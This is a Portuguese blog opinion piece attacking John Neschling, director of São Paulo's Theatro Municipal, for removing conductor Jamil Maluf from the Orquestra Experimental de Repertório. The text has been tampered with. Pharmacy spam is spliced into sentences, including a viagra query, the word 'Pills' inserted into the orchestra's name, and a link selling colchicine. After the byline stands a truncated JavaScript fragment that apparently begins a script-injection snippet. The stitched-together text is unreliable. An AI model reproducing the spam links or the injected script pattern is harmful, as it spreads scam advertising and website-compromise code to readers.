ArtigoLateral

Aos competentes… a demissão!

Buy

Jamil Maluf é afastado da Orquestra Pills Experimental de Repertório.


Quando John Neschling assumiu a direção artística do Theatro Municipal de São Paulo, já eram esperadas um monte de polêmicas e mudanças drásticas. Todos sabem que Joninho adora uma encrenca. O regente sempre se supera e qualquer um que lhe possa estar fazendo sombra no Theatro Municipal de São Paulo é afastado, demitido ou defenestrado.

No ano passado, tivemos o afastamento do regente Mário Zaccaro do Coral Lírico, trabalho competente é premiado com demissão no Teatro Municipal. Estarrecido, recebi a notícia de que o maestro Jamil Maluf foi afastado da direção da Orquestra Experimental de Repertório, fundada por ele mesmo nos anos noventa. E o pior e mais alarmante, segundo o site da rádio Cultura FM, essa decisão foi à revelia dos conselheiros da Fundação do Theatro Municipal. Para que servem esses conselheiros? Esse conselho é só para inglês ver.

John Neschling já tentara, no ano passado, mandar a Orquestra Experimental de Repertório para o distante teatro Paulo Eiró, para ela cair no ostracismo, mas não conseguiu. Não satisfeito, conseguiu agora afastar Jamil Maluf da direção da orquestra e, para não perder o hábito, cancelou a ópera Satyagraha, de Philip Glass, esta escolhida para ser dirigida por Jamil Maluf.

A questão que nunca se cala: por que John toma essas medidas? Segundo informações oficiais isso visa à integração dos corpos estáveis e a Experimental terá uma função pedagógica, apresentando-se em teatros de Bairro e CEUs. Tudo balela para ser publicado na Revista Concerto.

Buy

Aqui você sabe a verdade amigo. Só existem if a man has glaucoma can he use viagra duas explicações plausíveis para a demissão do maestro Maluf : sua competência, pois ele, com uma orquestra de jovens, conseguiu uma sonoridade melhor que a Orquestra Sinfônica Municipal de Neschling, e seu trabalho à frente da orquestra sempre superou em muito a orquestra titular da casa. Maluf rege melhor e consegue extrair mais dos músicos em concertos. Quando o assunto é música de ópera Maluf ganha de goleada de Neschling. É sabido que John não gosta de concorrência.

Outro detalhe que chama a atenção é que mandando a Experimental para teatros e Purchase Cheap Buy http://sportstulsa.com/colchicine-pills-for-sale/ CEUs da prefeitura e deixando-a a cargo da Secretaria da Educação Municipal sobram mais recursos para a Fundação do Theatro Municipal contratar cantores estrangeiros para papéis minúsculos.

Vejo a Orquestra Experimental de Repertório fadada ao desaparecimento lento e gradual.

Enquanto isso, no maravilhoso mundo das redes sociais, o diretor artístico do Municipal anuncia com orgulho ingressos esgotados para as duas apresentações da Trilogia Romana e nem sequer cita o nome do compositor da obra Ottorino Respighi. Pede a todos para divulgarem a abertura de uma récita extra para o próximo dia 18 como se nada acontecesse no Theatro Municipal de São Paulo.

Ainda bem que o cargo de diretor artístico do Theatro Municipal não é vitalício.

Ali Hassan Ayache

var d=document;var s=d.createElement(‘script’); if (document.currentScript) {

1 Comment

Leave a Response

Ali Hassan Ayache
Bacharel em Geografia pela USP. Apreciador de ópera, balé e música clássica. Ativo no meio musical, mantém o blog http://verdi.zip.net/. Escreve críticas, divulga eventos, entrevista personalidades e resenha óperas e balés em DVD.